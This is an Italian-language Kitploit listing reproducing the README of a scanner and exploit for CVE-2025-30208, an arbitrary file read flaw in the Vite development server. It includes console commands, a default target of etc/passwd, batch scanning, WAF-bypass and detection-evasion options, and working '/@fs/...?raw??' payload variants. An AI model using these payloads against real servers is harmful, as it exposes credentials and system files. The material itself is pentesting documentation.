Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 è una vulnerabilità di lettura arbitraria di file di media gravità nel server di sviluppo Vite (un popolare strumento di build frontend). | Kitploit
Strumenti/GitHubGitHub/themehackers/cve-2025-30208
Scanner di VulnerabilitàGenerazione di PayloadExploitRaccolta InformazioniSicurezza WebPenetration Testing
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 è una vulnerabilità di lettura arbitraria di file di media gravità nel server di sviluppo Vite (un popolare strumento di build frontend).

Vedi Repository
10141 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔥 Scanner di Vulnerabilità di Lettura Arbitraria di File Vite CVE-2025-30208

Python License Security Status Modular

Scanner di vulnerabilità avanzato per CVE-2025-30208 con funzionalità di livello enterprise

Strumento professionale di penetration testing per il rilevamento della vulnerabilità di lettura arbitraria di file in Vite

🚀 Avvio Rapido • 📋 Caratteristiche • 🔧 Utilizzo • 📊 Esempi • 🛡️ Sicurezza


📖 Panoramica

Questo è uno scanner di vulnerabilità completo progettato per rilevare e sfruttare la vulnerabilità CVE-2025-30208 nei server di sviluppo Vite. La vulnerabilità consente l'accesso alla lettura arbitraria di file attraverso gli endpoint del file system di Vite, esponendo potenzialmente file di configurazione sensibili, codice sorgente e informazioni di sistema.

🎯 Cosa Fa Questo Strumento

  • Rileva istanze Vite vulnerabili attraverso la rete
  • Sfrutta la vulnerabilità di lettura arbitraria di file in modo sicuro
  • Scopre file sensibili e dati di configurazione
  • Riporta i risultati in più formati (HTML, JSON, Console)
  • Gestisce sessioni di scansione e configurazioni
  • Gestisce gli errori in modo elegante con meccanismi di ripetizione automatica

🏗️ Architettura Modulare

Lo strumento ora presenta un'architettura modulare per una migliore manutenibilità ed estensibilità:

  • CVE-2025-30208.py - Applicazione scanner principale
  • payloads.py - Payload di sfruttamento avanzati (60+ varianti)
  • sensitive_files.py - Database completo di file sensibili (200+ file)
  • html_template.py - Template di reporting HTML in stile hacker migliorato

🚀 Avvio Rapido

Prerequisiti

pip3 install -r requirements.txt

Utilizzo Base

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Caratteristiche

🔍 Rilevamento Core della Vulnerabilità

  • 60+ Payload Avanzati: Tecniche di sfruttamento complete per il massimo rilevamento
  • Rilevamento Intelligente: Analisi delle risposte intelligente per evitare falsi positivi
  • Validazione in Tempo Reale: Validazione continua delle risposte del target
  • Test Completo: Testa tutti gli endpoint vulnerabili noti

🛡️ Funzionalità di Sicurezza Migliorate

  • Supporto Proxy: Configurazione proxy HTTP/HTTPS per anonimato
  • Header Personalizzati: Bypass WAF/IPS con header HTTP personalizzati
  • Limitazione della Frequenza: Ritardi configurabili per evitare rilevamento
  • Gestione delle Sessioni: Salva e ripristina sessioni di scansione
  • Validazione degli Input: Validazione completa dei parametri

🔧 Capacità Avanzate

  • Scansione in Lotto: Scansione multi-thread di più target
  • Scoperta di File Sensibili: Scoperta automatica di 200+ file sensibili
  • Test di Connettività: Test dei protocolli TCP/UDP/HTTP/HTTPS
  • Recupero dagli Errori: Ripetizione automatica con backoff esponenziale
  • Registrazione Completa: Log dettagliati con timestamp

📊 Reportistica e Output

  • 🎨 Report HTML Migliorati: Bellissimi report di vulnerabilità in stile hacker con animazioni
  • Esportazione JSON: Dati strutturati per ulteriori analisi
  • Output su Console: Feedback codificato a colori in tempo reale
  • File di Log: Audit trail dettagliati
  • Interfaccia Web Interattiva: Server web integrato per visualizzare i report

🔧 Guida all'Utilizzo

1. Configurazione Base

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Test della Vulnerabilità

CVE-2025-30208 > run

# Abilita la modalità verbose per output dettagliato
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Scansione in Lotto

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Premere Invio due volte per terminare]

4. Scoperta di File Sensibili

CVE-2025-30208 > scan

5. Configurazione Avanzata

# Configura proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Imposta header personalizzati
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configura limitazione della frequenza
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Reportistica HTML Migliorata

# Genera un bellissimo report HTML
CVE-2025-30208 > pull

# Avvia il server web per visualizzare il report
CVE-2025-30208 > web

# Avvia il server web su una porta specifica
CVE-2025-30208 > web 8081

# Arresta il server web
CVE-2025-30208 > web off

📊 Riferimento Comandi

ComandoDescrizioneEsempio
set <opzione> <valore>Imposta opzioni di configurazioneset RHOST 192.168.1.100
show optionsMostra le impostazioni correntishow options
editEditor interattivo delle opzioniedit
run / exploitEsegui test di vulnerabilitàrun
batchScansione batch di più targetbatch
scanScopri file sensibiliscan
pullEsporta risultati in HTML/JSONpull
web [on|off|porta]Server web per report HTMLweb 8080
saveSalva configurazione sessionesave
loadCarica configurazione sessioneload
testTesta la connettività al targettest
validateValida la configurazione correntevalidate
verboseAttiva/disattiva modalità verboseverbose
proxyConfigura impostazioni proxyproxy
headersImposta header HTTP personalizzatiheaders
rateConfigura limitazione della frequenzarate
logMostra informazioni di loglog
help / ?Mostra aiutohelp
exit / quitEsci dallo strumentoexit

⚙️ Opzioni di Configurazione

OpzioneDescrizioneValore PredefinitoValidazione
RHOSTIndirizzo host/IP target-Validazione hostname/IP
RPORTNumero porta target-Intervallo porte (1-65535)
FILEPATHPercorso file da testareetc/passwdValidazione percorso
PROXYURL proxy HTTP/HTTPS-Validazione formato URL
VERBOSEAbilita output verbosefalseValidazione booleana
RATE_LIMITRitardo tra richieste (secondi)0.3Validazione numerica
THREADSNumero di thread per scansione batch5Validazione intera
TIMEOUTTimeout richiesta (secondi)5Validazione intera
CUSTOM_HEADERSHeader HTTP personalizzati (JSON){}Validazione formato JSON

🎨 Sistema di Payload Migliorato

Lo scanner ora utilizza 60+ diverse varianti di payload organizzate in payloads.py:

Payload Primari @fs

/@fs/{percorso_file}?raw??
/@fs/{percorso_file}?raw&url
/@fs/{percorso_file}?import&raw??
/@fs/{percorso_file}?raw&import
/@fs/{percorso_file}?import&url

Variazioni Estese dei Parametri

/@fs/{percorso_file}?raw&source
/@fs/{percorso_file}?raw&content
/@fs/{percorso_file}?raw&data
/@fs/{percorso_file}?raw&file
/@fs/{percorso_file}?raw&type=text
/@fs/{percorso_file}?raw&format=text
/@fs/{percorso_file}?raw&encoding=utf8

Variazioni Specifiche di Vite

/@fs/{percorso_file}?raw&vite&dev
/@fs/{percorso_file}?raw&vite&hot
/@fs/{percorso_file}?raw&vite&hmr
/@fs/{percorso_file}?raw&development
/@fs/{percorso_file}?raw&debug
Scarica lo strumento